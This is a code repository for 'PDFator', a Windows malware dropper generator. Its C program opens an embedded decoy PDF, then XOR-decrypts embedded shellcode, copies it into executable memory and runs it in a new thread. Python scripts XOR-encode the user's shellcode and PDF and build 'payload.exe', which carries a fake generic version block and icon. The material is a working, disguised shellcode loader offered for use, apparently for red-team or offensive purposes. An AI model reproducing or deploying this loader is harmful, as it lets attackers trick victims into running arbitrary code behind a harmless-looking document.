├── README.md ├── Src ├── icon.ico ├── main.c ├── makefile └── resources.rc ├── generate.py └── xorfile.py /README.md: -------------------------------------------------------------------------------- 1 | # PDFator 2 | 3 | PDFator is an InfoSec project that consists of a Python script and a C application to generate an executable payload. The payload includes functionality to write and execute a PDF file and execute shellcode. Both the PDF file and shellcode are encrypted using XOR and decrypted at runtime. 4 | 5 | ## Requirements 6 | 7 | To run this project, you need the following: 8 | 9 | - Python 3.x 10 | - MinGW (Minimalist GNU for Windows) 11 | 12 | --- 13 | 14 | MinGW can be downloaded from here http://musl.cc/ 15 | 16 | ## Usage 17 | 18 | 1. Clone the repository: 19 | ```bash 20 | git clone https://github.com/smokeme/PDFator.git 21 | ``` 22 | 2. Change into the project directory: 23 | ```bash 24 | cd PDFator 25 | ``` 26 | 3. Prepare the payload by running the Python script: 27 | ```bash 28 | python generate.py 29 | ``` 30 | Replace `` with the path to your shellcode file, and `` with the path to your PDF file. 31 | The generated payload can be found in the project root directory with the name `payload.exe`. 32 | 33 | 34 | ## License 35 | 36 | This project is licensed under the MIT License. 37 | -------------------------------------------------------------------------------- /Src/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/PDFator/0f5db37778df2a3775c3e6b3e256fbed0774c3ba/Src/icon.ico -------------------------------------------------------------------------------- /Src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define SHELLCODE_ID 101 7 | #define PDF_ID 102 8 | 9 | #pragma comment(lib, "shlwapi.lib") 10 | 11 | void xorDecrypt(unsigned char* data, size_t size, unsigned char key) { 12 | for (size_t i = 0; i < size; i++) { 13 | data[i] = data[i] ^ key; 14 | } 15 | } 16 | 17 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 18 | unsigned char xorKey = 0xff; 19 | // Write the PDF from pdf.h to a file after decrypting it 20 | 21 | HRSRC hPDFRes = FindResource(hInstance, MAKEINTRESOURCE(PDF_ID), TEXT("RT_STRING")); 22 | if (hPDFRes) { 23 | HGLOBAL hPDFData = LoadResource(hInstance, hPDFRes); 24 | if (hPDFData) { 25 | DWORD pdfSize = SizeofResource(hInstance, hPDFRes); 26 | void* pdfData = LockResource(hPDFData); 27 | if (pdfData) { 28 | unsigned char* decryptedPDF = malloc(pdfSize); 29 | if (decryptedPDF) { 30 | memcpy(decryptedPDF, pdfData, pdfSize); 31 | xorDecrypt(decryptedPDF, pdfSize, xorKey); 32 | // Write the decrypted PDF data to the file 33 | TCHAR modulePath[MAX_PATH]; 34 | if (GetModuleFileName(NULL, modulePath, MAX_PATH) != 0) { 35 | // Remove the module filename from the path 36 | PathRemoveFileSpec(modulePath); 37 | 38 | // Combine the path with the PDF file name 39 | TCHAR pdfPath[MAX_PATH]; 40 | if (PathCombine(pdfPath, modulePath, TEXT("file.pdf")) != NULL) { 41 | // Create a file handle for writing 42 | HANDLE hFile = CreateFile(pdfPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 43 | if (hFile != INVALID_HANDLE_VALUE) { 44 | // Write the decrypted PDF data to the file 45 | DWORD bytesWritten; 46 | if (WriteFile(hFile, decryptedPDF, pdfSize, &bytesWritten, NULL) && bytesWritten == pdfSize) { 47 | // File writing succeeded 48 | ShellExecute(NULL, TEXT("open"), pdfPath, NULL, NULL, SW_SHOWNORMAL); 49 | } 50 | else { 51 | } 52 | CloseHandle(hFile); 53 | } 54 | else { 55 | } 56 | } 57 | else { 58 | } 59 | } 60 | else { 61 | } 62 | free(decryptedPDF); 63 | } 64 | else { 65 | } 66 | } 67 | else { 68 | } 69 | FreeResource(hPDFData); 70 | } 71 | else { 72 | } 73 | } 74 | else { 75 | } 76 | 77 | HRSRC hShellcodeRes = FindResource(hInstance, MAKEINTRESOURCE(SHELLCODE_ID), TEXT("RT_STRING")); 78 | if (hShellcodeRes) { 79 | HGLOBAL hShellcodeData = LoadResource(hInstance, hShellcodeRes); 80 | if (hShellcodeData) { 81 | DWORD shellcodeSize = SizeofResource(hInstance, hShellcodeRes); 82 | void* shellcode = LockResource(hShellcodeData); 83 | if (shellcode) { 84 | xorDecrypt(shellcode, shellcodeSize, xorKey); 85 | HANDLE lpAddr = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 86 | if (lpAddr) { 87 | memcpy(lpAddr, shellcode, shellcodeSize); 88 | } 89 | else { 90 | } 91 | HANDLE hThread = CreateThread(NULL, 0, lpAddr, NULL, 0, NULL); 92 | if (hThread) { 93 | WaitForSingleObject(hThread, INFINITE); 94 | CloseHandle(hThread); 95 | } 96 | else { 97 | } 98 | } 99 | else { 100 | } 101 | FreeResource(hShellcodeData); 102 | } 103 | else { 104 | } 105 | } 106 | else { 107 | } 108 | 109 | return 0; 110 | } 111 | -------------------------------------------------------------------------------- /Src/makefile: -------------------------------------------------------------------------------- 1 | CC = x86_64-w64-mingw32-gcc 2 | RC = x86_64-w64-mingw32-windres 3 | CFLAGS = -mwindows 4 | LDFLAGS = -lshlwapi 5 | 6 | all: main.exe 7 | 8 | main.exe: main.o resources.o 9 | $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) 10 | 11 | main.o: main.c 12 | $(CC) $(CFLAGS) -c $< -o $@ 13 | 14 | resources.o: resources.rc 15 | $(RC) -o $@ $< 16 | 17 | clean: 18 | rm -f main.o resources.o main.exe -------------------------------------------------------------------------------- /Src/resources.rc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | IDI_ICON1 ICON "icon.ico" 4 | #define SHELLCODE_ID 101 5 | #define PDF_ID 102 6 | 7 | SHELLCODE_ID RT_STRING "1.bin" 8 | PDF_ID RT_STRING "1.pdf" 9 | 10 | 1 VERSIONINFO 11 | FILEVERSION 1,0,0,0 12 | PRODUCTVERSION 1,0,0,0 13 | FILEOS VOS_NT_WINDOWS32 14 | FILETYPE VFT_APP 15 | BEGIN 16 | BLOCK "StringFileInfo" 17 | BEGIN 18 | BLOCK "040904E4" 19 | BEGIN 20 | VALUE "CompanyName", "Your Company Name" 21 | VALUE "FileVersion", "1.0.0.0" 22 | VALUE "InternalName", "MyApp" 23 | VALUE "OriginalFilename", "MyApp.exe" 24 | VALUE "ProductName", "MyApp" 25 | VALUE "ProductVersion", "1.0.0.0" 26 | END 27 | END 28 | 29 | BLOCK "VarFileInfo" 30 | BEGIN 31 | VALUE "Translation", 0x409, 1252 32 | END 33 | END 34 | -------------------------------------------------------------------------------- /generate.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | def generateExe(): 5 | # run "make" in the Src folder to generate the executable file 6 | os.system("cd Src && make") 7 | # move the executable file to the current folder 8 | os.system("mv Src/main.exe payload.exe") 9 | # Clean the Src folder 10 | os.system("cd Src && make clean") 11 | # Remove the 1.bin and 1.pdf in the Src folder 12 | os.system("rm Src/1.bin") 13 | os.system("rm Src/1.pdf") 14 | print("[+] payload.exe is ready to be used") 15 | 16 | def prepare(raw_shellcode,pdf_file): 17 | # Check if the files exist or not 18 | if not os.path.exists(raw_shellcode): 19 | print("File not found: " + raw_shellcode) 20 | exit(1) 21 | if not os.path.exists(pdf_file): 22 | print("File not found: " + pdf_file) 23 | exit(1) 24 | # use the file xorfile.py to xor the shellcode and the pdf file and save them as 1.bin and 1.pdf inside the Src folder 25 | os.system("python xorfile.py " + raw_shellcode + " 1.bin") 26 | os.system("python xorfile.py " + pdf_file + " 1.pdf") 27 | # move the 1.bin and 1.pdf to the Src folder 28 | os.system("mv 1.bin Src/1.bin") 29 | os.system("mv 1.pdf Src/1.pdf") 30 | print(f"[+] {raw_shellcode} and {pdf_file} are ready to be used as payload") 31 | 32 | if __name__ == "__main__": 33 | args = sys.argv 34 | if len(args) != 3: 35 | print("Usage: python generate.py ") 36 | exit(1) 37 | raw_shellcode = args[1] 38 | pdf_file = args[2] 39 | prepare(raw_shellcode, pdf_file) 40 | generateExe() -------------------------------------------------------------------------------- /xorfile.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def xor(input): 4 | output = bytearray(len(input)) 5 | for i in range(len(input)): 6 | output[i] = input[i] ^ 0xff 7 | return output 8 | 9 | def main(): 10 | with open(sys.argv[1], 'rb') as filein: 11 | filedata = bytearray(filein.read()) 12 | 13 | fileout = open(sys.argv[2], 'wb') 14 | fileout.write(xor(filedata)) 15 | fileout.close() 16 | 17 | if __name__ == '__main__': 18 | main() 19 | --------------------------------------------------------------------------------